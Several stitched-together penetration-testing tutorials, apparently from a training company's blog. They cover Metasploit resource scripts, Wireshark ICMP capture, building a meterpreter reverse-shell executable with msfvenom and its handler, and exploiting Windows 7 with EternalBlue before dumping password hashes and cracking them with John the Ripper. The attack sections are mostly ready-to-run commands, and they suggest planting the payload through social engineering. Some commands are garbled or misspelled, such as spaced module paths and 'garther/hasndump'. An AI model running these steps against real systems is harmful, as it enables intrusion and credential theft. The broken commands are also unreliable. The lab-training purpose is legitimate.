Creating a simple resource script to be used with Metasploit.

As penetration testers or if you just performing a simple or regular scan, we all know that the tasks can become a repetitive process (e. g. if you are performing a pentest in a streamlined environment). Typing, again and again, the Metasploit commands and making minor changes to perform an attack in the target can get a bit tiresome, but not to worry, here is where resource scripts can be very useful and be used on Metasploit to automate the repetitive tasks at hand.

They are essentially batch scripts and contain a set of commands that are automatically and sequentially executed when you load this resource scripts in Metasploit. A resource script can be created by chaining together a series of console Metasploit commands, mainly used for scanning purposes, and you can even directly embed Ruby to do things like call APIs, interact with objects in the database, and iterate actions.

We are going to create a simple resource script as an example, that will automate, the auxiliary scanning in an ftp service and will inform us what version of ftp service, the target is currently running.

The commands are basically the same that you are accustomed to using in Metasploit with the adding of the automation process.

You can create the script in any text editor you feel comfortable with.

We’ll create the script by typing Metasploit commands (the commands are the same regarding structure) but the commands will be executed unsequentially.

The first command we’ll use is the following:

msfconsole
use auxiliary/scanner/ftp/ftp_version

This will execute the scanning process and will tell us what ftp version is running in the target, as we have said before.

The next command will be to “see” what options you want to execute in the Pentest using the script you’ll be creating.

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary (scanner/ftp/ftp_version) options

As a result, you will see the options available for the ftp service. For this example, the most important aspects are the RHOST, the threads in it, and to select the appropriate range of machines (target).

So for the script, we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4 [target host]
set THREADS 10 [number of threads]

The threads are dependant on the scale of the network, so, if you are scanning a large networks, you have to increase the amount of threads you want to use.

Now there’s something to be considered about this. and is the fact that you can change this values “on the fly”, therefore, you don’t have to type into the metasploit console the commands again and again if you want to change the options you want to explore, you can change it in the script and they can be executed remotely.

And now we just execute the command, or if you you are using an exploit module; exploit, but as this is a simple resource script we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.103
set THREADS 10
run

We save this text file as  

vim ftp_scanner.rc

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4
set THREADS 10
run

esc
:
w


Where the extension .rc means resource script. Now we locate the script to be run in Metasploit. In there you type:

cd (location of the script you just created)

You have to make sure that your Metasploit post-rescue database is built and is already running. So now we can perform the Pentest of the ftp service by running this script, to look for threads in the RHOST of the target host

In Metasploit we type

msfconsole -r ftp_scanner.rc


This will start the Metasploit Framework and launch the created resource script.

Advantages of the Resource Scripts

And now the interesting this about this procedure is that after performing the scanning and getting the results assorted and ready for you to assess the information you just obtained if you want to change the IP or increase the threads you just have to edit the script and run it again.

Resource scripts versatility lies in their ability to take advantage of many of the capabilities that are available in Metasploit and Ruby, whether you are using them from the Metasploit console or from the Metasploit web interface.

The community of The Metasploit Framework has made available many resource scripts, so if you are a framework user, you can go to.

Here at Infosec Addicts in our courses Pentesting Candidate program and Ultimate Hacklab, you can get more information about the creation of this useful tools to facilitate the performing of any audit procedures or Pentest, using Metasploit. We hope sincerely that you can join us in this quest, of finding the best and more reliable solutions to be able to perform a Pentest in a throughout and reliable way for you.

 

 

Data-mining a compromised host

In this blog, we are going to take a file that can be .txt .doc .exe and we inject a payload to it, later we will verify which antivirus it detects, and finally, we will be able this file in the victim, and we will observe what happens.

what is a payload?

We can say that a payload is something harmful that is activated when executing any malware, in addition to raising privileges, it takes full advantage of the vulnerabilities found, in essence, the Payload is the part of the malicious code within the exploit, in charge of exploiting and exploiting this vulnerability to the maximum.

Installing tools in ubuntu and Debian

It does not emphasize the installation of Metasploit, but we will do a little review, so you know what it is about.

We open a Linux terminal and copies and paste the following command:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

The result of the command will be the following:

In case you have some error with the installation in this link https://www.metasploit.com/ you find the necessary documentation to perform the installation

To create a payload we have a lot of tools, a significant one is Metasploit; we will generate a payload to attack Windows 7.

msfvenom -a x86 –platform windows -p windows / meterpreter / reverse_tcp LHOST = 192.168.100.3 -b “\ x00” -f exe -o Meterpreter.exe

This is the file that we have created and that we will put on the victim machine.

touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.100.3 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
cat meterpreter.rc

msfconsole -r meterpreter.rc

To put the payload on the victim’s machine, you can use social engineering or any other way. In this case, we will upload it with a meterpreter session to make it faster.

The following image shows the file on the Windows 7 machine.

This would be the result of the attack

Checking the victim’s network settings

This is another command with which we can do tests, this serves to show a list of files and directories.

A session of meterpreter as a shell of windows you have a large amount of commands that are very useful at the time of making an attack.

 

How to analyze network protocols with Wireshark

Wireshark is an essential tool to analyze network protocols, but what is this? How is it used? What results do I get? That what we will learn in this blog, if we are ever hired in any company, and we are asked to analyze in network traffic this is one of the best tools we have and something better is completely free.

Installation of wireshark

The installation of these tools is very simple. We have to open a Linux terminal and write the following command:

$ sudo apt-get -y install wireshark

$ sudo apt-get install wireshark-qt

we select yes and press enter

We start wireshark with the following command:

$ wireshark

$ sudo /usr/bin/dumpcap

$ sudo chmod 4711 /usr/bin/dumpcap

We verify the addresses of each virtual machine, Open a Linux terminal and write:

$ ifconfig

This is the IP address of the virtual machine where we have wireshark installed.

This is the IP address of the other virtual machine that will help us generate ICMP traffic.

It is not necessary to do the previous verification, we only do it to ensure that the test is successful.

How Wireshark is used

We choose the interface that we want to monitor, for this case we will take the enp0s3.

We select the network protocol that we want to monitor, which in this case is ICMP.

We ping with the following command:

$ ping 192.168.100.4

After pinging, we immediately have the result in wireshark.

So far we have only managed Wireshark to work correctly, but what do we do with that amount of information that we can export? Do not be afraid you will learn something elementary to analyze and organize this type of information.

We click on the stop button as shown in the following image.

Then we go to file and export the file as CSV.

We put a name on it and store it in the desired place.

We right click on the file and then open with other Application.

We select LibreOffices.

we click on OK

And, finally, we have all the information in a spreadsheet, and with LibreOffice, you can organize it, filter it, graph it, see which event repeats more, which are the hours of most significant use, etc. You can also see it in Windows with Excel. It is a simple way to analyze the information, but it is not the only one.

We look for this icon in our spreadsheet and we click on it.

We select the protocol that we want to filter.

Then we filter the protocol that we want to analyze, and we can also plot depending on the objective of the search. If you’re going to do the task of analysis automatically and quickly, python has several modules to analyze the spreadsheet, and you can save a lot of time.

Finally you will have the best criteria to analyze the information.

How to Obtain Credentials on a Compromised host

If you are one of those people that you are passionate about doing hacking tests, then you are reading what is indicated. Well first we will look for the way to obtain a revers-Shell of our victim, and after that, we will get a list of user and passwords that are found by the victim team.

The laboratory is the following:

1) We have a local network that can be that of a company, home, any business.

2) We have a victim with windows 7, you can do the test with any other operating system you have to select the appropriate exploit in Metasploit.

3) the attacking machine can be Ubuntu or Kali Linux, the important thing is that it has Metasploit.

Step 1

We turn on the virtual machines and make sure they are connected in the same local network. In case they are not, we must configure the Network on both computers if you use VirtualBox is something elementary to do.

we must be sure that the virtual machines are connected in the same local network, we will use nmap.

$ sudo apt-get install nmap
$ sudo nmap -sP <Network / Mask >

For example:

$ sudo nmap -sP 192.168.1.0/24

Step 2

In a linux terminal we write the following:

$ msfconsole

After starting the metasploit console we will use the following exploit:

msf> use exploit / windows / smb / ms17_010_eternalblue
msf> show options
msf> set payload windows / x64 / meterpreter / reverse_tcp
msf> show options
We configure the remote, local ip and in the same way we configure the ports.

And finally we wrote “exploit”

Step 3

After opting for the meterepreter section we write the following:

run post/windows/garther/hasndump

So far we have obtained the username and password in hash mode.

Step 4

After obtaining the user and password in hash mode, we can use John de ripper to decipher that password. In the next part of this blog is the correct way to use John de ripper.

    sudo apt install john
Your password
Installation process
Finished installation

Step 5

You can save the hash in a file.txt as it appears in the following image.

we create a file with this content

we write the following commands.

$ cat pass.txt
$ john --single pass.txt
$ john -- show pass.txt

The answer is obtained in milliseconds for this case the password was “example”.